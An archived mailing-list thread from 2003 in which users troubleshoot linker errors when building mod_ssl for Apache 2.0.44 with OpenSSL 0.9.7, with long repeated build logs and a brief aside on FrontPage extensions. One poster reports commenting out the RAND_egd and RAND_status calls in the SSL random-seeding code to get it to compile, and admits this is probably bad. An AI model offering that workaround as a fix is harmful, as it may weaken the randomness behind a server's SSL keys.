> openssl version's libraries....

Yes, I tried to compile it against different openssl-version and didn't 
make clean in betweend (dumb fault by me)

After cleaning and compiling again we get some other errors.
undefined reference to OPENSSL_free, RAND_egd and RAND_status (se below 
for complete data)

In order to make apache compile we
- changed OPENSSL_free to CRYPTO_free in a #define in the modules/ssl/ 
headers file. (As that is done in openssl anyway)
- commented out the 3+3 lines where RAND_egd and RAND_status are used in 
modules/ssl/ssl_engine_rand.c

Now we can compile and use it over ssl even though commenting out non 
working code is propably a bad thing to do.


./configure --prefix=/service/apache2 
--exec-prefix=/service/apache2/arch/linux-intel --enable-ssl 
--with-openssl=/service/apache2/openssl/
...lots of rows...
make
...lots of rows...
/bin/sh /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool 
--mode=link gcc  -g -O2 -pthread    -DLINUX=2 -D_REENTRANT 
-D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE 
-DAP_HAVE_DESIGNATED_INITIALIZER 
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include 
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include 
-I/service/apache2/openssl/include 
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
-I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix 
-I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork 
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/http 
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters 
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy 
-I/usr/local/service/apache2/src/httpd-2.0.44/include 
-I/usr/local/ssl/include/openssl -I/usr/local/ssl/include 
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main 
-export-dynamic 
-L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
-L/usr/local/ssl/lib   -o httpd  modules.lo  modules/aaa/mod_access.la 
modules/aaa/mod_auth.la modules/filters/mod_include.la 
modules/loggers/mod_log_config.la modules/metadata/mod_env.la 
modules/metadata/mod_setenvif.la modules/ssl/mod_ssl.la 
modules/http/mod_http.la modules/http/mod_mime.la 
modules/generators/mod_status.la modules/generators/mod_autoindex.la 
modules/generators/mod_asis.la modules/generators/mod_cgi.la 
modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la 
modules/mappers/mod_imap.la modules/mappers/mod_actions.la 
modules/mappers/mod_userdir.la modules/mappers/mod_alias.la 
modules/mappers/mod_so.la server/mpm/prefork/libprefork.la 
server/libmain.la os/unix/libos.la -lssl -lcrypto 
/usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la 
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.la 
-lgdbm -ldb 
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib/libexpat.la 
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la -lm 
-lcrypt -lnsl -lresolv -ldl
modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
`ssl_hook_UserCheck':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:875: 
undefined reference to `OPENSSL_free'
modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
`ssl_callback_SSLVerify':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1206: 
undefined reference to `OPENSSL_free'
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1210: 
undefined reference to `OPENSSL_free'
modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
`ssl_callback_SSLVerify_CRL':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1469: 
undefined reference to `OPENSSL_free'
modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
`modssl_proxy_info_log':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1507: 
undefined reference to `OPENSSL_free'
modules/ssl/.libs/mod_ssl.al(ssl_engine_rand.lo): In function 
`ssl_rand_seed':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:125: 
undefined reference to `RAND_egd'
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:163: 
undefined reference to `RAND_status'
modules/ssl/.libs/mod_ssl.al(ssl_engine_vars.lo): In function 
`ssl_var_lookup_ssl_cert':
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_vars.c:351: 
undefined reference to `OPENSSL_free'

Machine running Linux 2.2.17-14smp (RedHat 6.2)
openssl 0.9.7
apache 2.0.44

-- 
__________________________
Erik Melkersson, Technical Webmaster
UNIT, Linköpings Universitet
melker@unit.liu.se, 013-285794
http://www.unit.liu.se/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 10:38:51 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AFC3F2AA0AE; Fri,  7 Feb 2003 10:38:51 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 775472AA0A3
	for ; Fri,  7 Feb 2003 10:38:45 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Fri, 07 Feb 2003 10:38:39 +0100
Message-ID: <3E437E9F.6000209@stupar.homelinux.net>
Date: Fri, 07 Feb 2003 10:38:39 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have just succesfully compiled apache 2.0.44 with mod_ssl and openssl
0.9.7 on RH8. First I have compiled openssl then apache and everything
works fine. On trick after make install in openssl it doesn't copy
headers so you have to manually copy them to your install directory.

On 2/7/2003 10:25 AM, Erik Melkersson a écrit:
> Hi!
> 
> Thanks for the reply.
> 
> Geoff Thorpe wrote:
>> ... The kind of linker
>> error you report usually suggests the code was compiled against one
>> openssl version's headers, but is trying to link against a different
>> openssl version's libraries....
> 
> Yes, I tried to compile it against different openssl-version and didn't 
> make clean in betweend (dumb fault by me)
> 
> After cleaning and compiling again we get some other errors.
> undefined reference to OPENSSL_free, RAND_egd and RAND_status (se below 
> for complete data)
> 
> In order to make apache compile we
> - changed OPENSSL_free to CRYPTO_free in a #define in the modules/ssl/ 
> headers file. (As that is done in openssl anyway)
> - commented out the 3+3 lines where RAND_egd and RAND_status are used in 
> modules/ssl/ssl_engine_rand.c
> 
> Now we can compile and use it over ssl even though commenting out non 
> working code is propably a bad thing to do.
> 
> 
> ./configure --prefix=/service/apache2 
> --exec-prefix=/service/apache2/arch/linux-intel --enable-ssl 
> --with-openssl=/service/apache2/openssl/
> ...lots of rows...
> make
> ...lots of rows...
> /bin/sh /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool 
> --mode=link gcc  -g -O2 -pthread    -DLINUX=2 -D_REENTRANT 
> -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE 
> -DAP_HAVE_DESIGNATED_INITIALIZER 
> -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include 
> -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include 
> -I/service/apache2/openssl/include 
> -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
> -I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix 
> -I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork 
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/http 
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters 
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy 
> -I/usr/local/service/apache2/src/httpd-2.0.44/include 
> -I/usr/local/ssl/include/openssl -I/usr/local/ssl/include 
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main 
> -export-dynamic 
> -L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
> -L/usr/local/ssl/lib   -o httpd  modules.lo  modules/aaa/mod_access.la 
> modules/aaa/mod_auth.la modules/filters/mod_include.la 
> modules/loggers/mod_log_config.la modules/metadata/mod_env.la 
> modules/metadata/mod_setenvif.la modules/ssl/mod_ssl.la 
> modules/http/mod_http.la modules/http/mod_mime.la 
> modules/generators/mod_status.la modules/generators/mod_autoindex.la 
> modules/generators/mod_asis.la modules/generators/mod_cgi.la 
> modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la 
> modules/mappers/mod_imap.la modules/mappers/mod_actions.la 
> modules/mappers/mod_userdir.la modules/mappers/mod_alias.la 
> modules/mappers/mod_so.la server/mpm/prefork/libprefork.la 
> server/libmain.la os/unix/libos.la -lssl -lcrypto 
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la 
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.la 
> -lgdbm -ldb 
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib/libexpat.la 
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la -lm 
> -lcrypt -lnsl -lresolv -ldl
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> `ssl_hook_UserCheck':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:875: 
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> `ssl_callback_SSLVerify':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1206: 
> undefined reference to `OPENSSL_free'
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1210: 
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> `ssl_callback_SSLVerify_CRL':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1469: 
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> `modssl_proxy_info_log':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1507: 
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_rand.lo): In function 
> `ssl_rand_seed':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:125: 
> undefined reference to `RAND_egd'
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:163: 
> undefined reference to `RAND_status'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_vars.lo): In function 
> `ssl_var_lookup_ssl_cert':
> /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_vars.c:351: 
> undefined reference to `OPENSSL_free'
> 
> Machine running Linux 2.2.17-14smp (RedHat 6.2)
> openssl 0.9.7
> apache 2.0.44
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 17:31:57 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A4722AA0A3; Fri,  7 Feb 2003 17:31:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.coinfotech.com (mail.coinfotech.com [209.12.32.66])
	by master.modssl.org (Postfix) with ESMTP id 8FF832AA065
	for ; Fri,  7 Feb 2003 17:31:55 +0100 (CET)
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Problems compiling mod_ssl with apache 2.0.44
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Content-Class: urn:content-classes:message
Date: Fri, 7 Feb 2003 09:31:52 -0700
Message-ID: <689DEB27979E3243A92D723D72CD6B3D022C7A@maple.office.coinfotech.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problems compiling mod_ssl with apache 2.0.44
Thread-Index: AcLOjMVgR2YBUgvQQLazlYIbiZZg+QAOYpsw
From: "Boulytchev, Vasiliy" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boulytchev, Vasiliy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is off the modssl track, but has anyone gotten frontpage extensions =
working for httpd-2.0.44?   2.0.40 is the supported version, and the =
install quits if that is not it.  Just checking....  =20


-----Original Message-----
From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net]
Sent: Friday, February 07, 2003 2:39 AM
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44


I have just succesfully compiled apache 2.0.44 with mod_ssl and openssl
0.9.7 on RH8. First I have compiled openssl then apache and everything
works fine. On trick after make install in openssl it doesn't copy
headers so you have to manually copy them to your install directory.

On 2/7/2003 10:25 AM, Erik Melkersson a =E9crit:
> Hi!
>=20
> Thanks for the reply.
>=20
> Geoff Thorpe wrote:
>> ... The kind of linker
>> error you report usually suggests the code was compiled against one
>> openssl version's headers, but is trying to link against a different
>> openssl version's libraries....
>=20
> Yes, I tried to compile it against different openssl-version and =
didn't=20
> make clean in betweend (dumb fault by me)
>=20
> After cleaning and compiling again we get some other errors.
> undefined reference to OPENSSL_free, RAND_egd and RAND_status (se =
below=20
> for complete data)
>=20
> In order to make apache compile we
> - changed OPENSSL_free to CRYPTO_free in a #define in the modules/ssl/ =

> headers file. (As that is done in openssl anyway)
> - commented out the 3+3 lines where RAND_egd and RAND_status are used =
in=20
> modules/ssl/ssl_engine_rand.c
>=20
> Now we can compile and use it over ssl even though commenting out non=20
> working code is propably a bad thing to do.
>=20
>=20
> ./configure --prefix=3D/service/apache2=20
> --exec-prefix=3D/service/apache2/arch/linux-intel --enable-ssl=20
> --with-openssl=3D/service/apache2/openssl/
> ...lots of rows...
> make
> ...lots of rows...
> /bin/sh /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool =

> --mode=3Dlink gcc  -g -O2 -pthread    -DLINUX=3D2 -D_REENTRANT=20
> -D_XOPEN_SOURCE=3D500 -D_BSD_SOURCE -D_SVID_SOURCE=20
> -DAP_HAVE_DESIGNATED_INITIALIZER=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include=20
> -I/service/apache2/openssl/include=20
> =
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/l=
ib=20
> -I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/http=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/include=20
> -I/usr/local/ssl/include/openssl -I/usr/local/ssl/include=20
> -I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main=20
> -export-dynamic=20
> =
-L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/l=
ib=20
> -L/usr/local/ssl/lib   -o httpd  modules.lo  modules/aaa/mod_access.la =

> modules/aaa/mod_auth.la modules/filters/mod_include.la=20
> modules/loggers/mod_log_config.la modules/metadata/mod_env.la=20
> modules/metadata/mod_setenvif.la modules/ssl/mod_ssl.la=20
> modules/http/mod_http.la modules/http/mod_mime.la=20
> modules/generators/mod_status.la modules/generators/mod_autoindex.la=20
> modules/generators/mod_asis.la modules/generators/mod_cgi.la=20
> modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la=20
> modules/mappers/mod_imap.la modules/mappers/mod_actions.la=20
> modules/mappers/mod_userdir.la modules/mappers/mod_alias.la=20
> modules/mappers/mod_so.la server/mpm/prefork/libprefork.la=20
> server/libmain.la os/unix/libos.la -lssl -lcrypto=20
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la=20
> =
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.=
la=20
> -lgdbm -ldb=20
> =
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib=
/libexpat.la=20
> /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la -lm =

> -lcrypt -lnsl -lresolv -ldl
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> `ssl_hook_UserCheck':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:875:=20
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> `ssl_callback_SSLVerify':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1206:=20
> undefined reference to `OPENSSL_free'
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1210:=20
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> `ssl_callback_SSLVerify_CRL':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1469:=20
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function=20
> `modssl_proxy_info_log':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel=
.c:1507:=20
> undefined reference to `OPENSSL_free'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_rand.lo): In function=20
> `ssl_rand_seed':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c=
:125:=20
> undefined reference to `RAND_egd'
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c=
:163:=20
> undefined reference to `RAND_status'
> modules/ssl/.libs/mod_ssl.al(ssl_engine_vars.lo): In function=20
> `ssl_var_lookup_ssl_cert':
> =
/usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_vars.c=
:351:=20
> undefined reference to `OPENSSL_free'
>=20
> Machine running Linux 2.2.17-14smp (RedHat 6.2)
> openssl 0.9.7
> apache 2.0.44
>=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 17:47:47 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F005D2AA0A3; Fri,  7 Feb 2003 17:47:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id F34D12AA086
	for ; Fri,  7 Feb 2003 17:47:41 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA18496
	for ; Fri, 7 Feb 2003 11:46:03 -0500
Date: Fri, 7 Feb 2003 11:46:02 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: RE: Problems compiling mod_ssl with apache 2.0.44
In-Reply-To: <689DEB27979E3243A92D723D72CD6B3D022C7A@maple.office.coinfotech.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

are you sure you wish to degrade the security of your apache  server with
front[age extensions?  Frontpage and coldfusion have a nasty security
history.


Thanks,

Ron DuFresne


On Fri, 7 Feb 2003, Boulytchev, Vasiliy wrote:

> This is off the modssl track, but has anyone gotten frontpage extensions working for httpd-2.0.44?   2.0.40 is the supported version, and the install quits if that is not it.  Just checking....   
> 
> 
> -----Original Message-----
> From: Sasa STUPAR [mailto:sasa@stupar.homelinux.net]
> Sent: Friday, February 07, 2003 2:39 AM
> To: modssl-users@modssl.org
> Subject: Re: Problems compiling mod_ssl with apache 2.0.44
> 
> 
> I have just succesfully compiled apache 2.0.44 with mod_ssl and openssl
> 0.9.7 on RH8. First I have compiled openssl then apache and everything
> works fine. On trick after make install in openssl it doesn't copy
> headers so you have to manually copy them to your install directory.
> 
> On 2/7/2003 10:25 AM, Erik Melkersson a écrit:
> > Hi!
> > 
> > Thanks for the reply.
> > 
> > Geoff Thorpe wrote:
> >> ... The kind of linker
> >> error you report usually suggests the code was compiled against one
> >> openssl version's headers, but is trying to link against a different
> >> openssl version's libraries....
> > 
> > Yes, I tried to compile it against different openssl-version and didn't 
> > make clean in betweend (dumb fault by me)
> > 
> > After cleaning and compiling again we get some other errors.
> > undefined reference to OPENSSL_free, RAND_egd and RAND_status (se below 
> > for complete data)
> > 
> > In order to make apache compile we
> > - changed OPENSSL_free to CRYPTO_free in a #define in the modules/ssl/ 
> > headers file. (As that is done in openssl anyway)
> > - commented out the 3+3 lines where RAND_egd and RAND_status are used in 
> > modules/ssl/ssl_engine_rand.c
> > 
> > Now we can compile and use it over ssl even though commenting out non 
> > working code is propably a bad thing to do.
> > 
> > 
> > ./configure --prefix=/service/apache2 
> > --exec-prefix=/service/apache2/arch/linux-intel --enable-ssl 
> > --with-openssl=/service/apache2/openssl/
> > ...lots of rows...
> > make
> > ...lots of rows...
> > /bin/sh /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool 
> > --mode=link gcc  -g -O2 -pthread    -DLINUX=2 -D_REENTRANT 
> > -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE 
> > -DAP_HAVE_DESIGNATED_INITIALIZER 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include 
> > -I/service/apache2/openssl/include 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
> > -I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/http 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/include 
> > -I/usr/local/ssl/include/openssl -I/usr/local/ssl/include 
> > -I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main 
> > -export-dynamic 
> > -L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib 
> > -L/usr/local/ssl/lib   -o httpd  modules.lo  modules/aaa/mod_access.la 
> > modules/aaa/mod_auth.la modules/filters/mod_include.la 
> > modules/loggers/mod_log_config.la modules/metadata/mod_env.la 
> > modules/metadata/mod_setenvif.la modules/ssl/mod_ssl.la 
> > modules/http/mod_http.la modules/http/mod_mime.la 
> > modules/generators/mod_status.la modules/generators/mod_autoindex.la 
> > modules/generators/mod_asis.la modules/generators/mod_cgi.la 
> > modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la 
> > modules/mappers/mod_imap.la modules/mappers/mod_actions.la 
> > modules/mappers/mod_userdir.la modules/mappers/mod_alias.la 
> > modules/mappers/mod_so.la server/mpm/prefork/libprefork.la 
> > server/libmain.la os/unix/libos.la -lssl -lcrypto 
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la 
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.la 
> > -lgdbm -ldb 
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib/libexpat.la 
> > /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la -lm 
> > -lcrypt -lnsl -lresolv -ldl
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> > `ssl_hook_UserCheck':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:875: 
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> > `ssl_callback_SSLVerify':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1206: 
> > undefined reference to `OPENSSL_free'
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1210: 
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> > `ssl_callback_SSLVerify_CRL':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1469: 
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_kernel.lo): In function 
> > `modssl_proxy_info_log':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_kernel.c:1507: 
> > undefined reference to `OPENSSL_free'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_rand.lo): In function 
> > `ssl_rand_seed':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:125: 
> > undefined reference to `RAND_egd'
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_rand.c:163: 
> > undefined reference to `RAND_status'
> > modules/ssl/.libs/mod_ssl.al(ssl_engine_vars.lo): In function 
> > `ssl_var_lookup_ssl_cert':
> > /usr/local/service/apache2/src/httpd-2.0.44/modules/ssl/ssl_engine_vars.c:351: 
> > undefined reference to `OPENSSL_free'
> > 
> > Machine running Linux 2.2.17-14smp (RedHat 6.2)
> > openssl 0.9.7
> > apache 2.0.44
> > 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 18:19:50 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A3E82AA0AE; Fri,  7 Feb 2003 18:19:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.coinfotech.com (mail.coinfotech.com [209.12.32.66])
	by master.modssl.org (Postfix) with ESMTP id 19C272AA086
	for ; Fri,  7 Feb 2003 18:19:48 +0100 (CET)
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Problems compiling mod_ssl with apache 2.0.44
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Content-Class: urn:content-classes:message
Date: Fri, 7 Feb 2003 10:19:46 -0700
Message-ID: <689DEB27979E3243A92D723D72CD6B3D022C7B@maple.office.coinfotech.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Problems compiling mod_ssl with apache 2.0.44
Thread-Index: AcLOyLEtSywM7zPcTJatss6vALWu8wABFXhg
From: "Boulytchev, Vasiliy" 
To: 
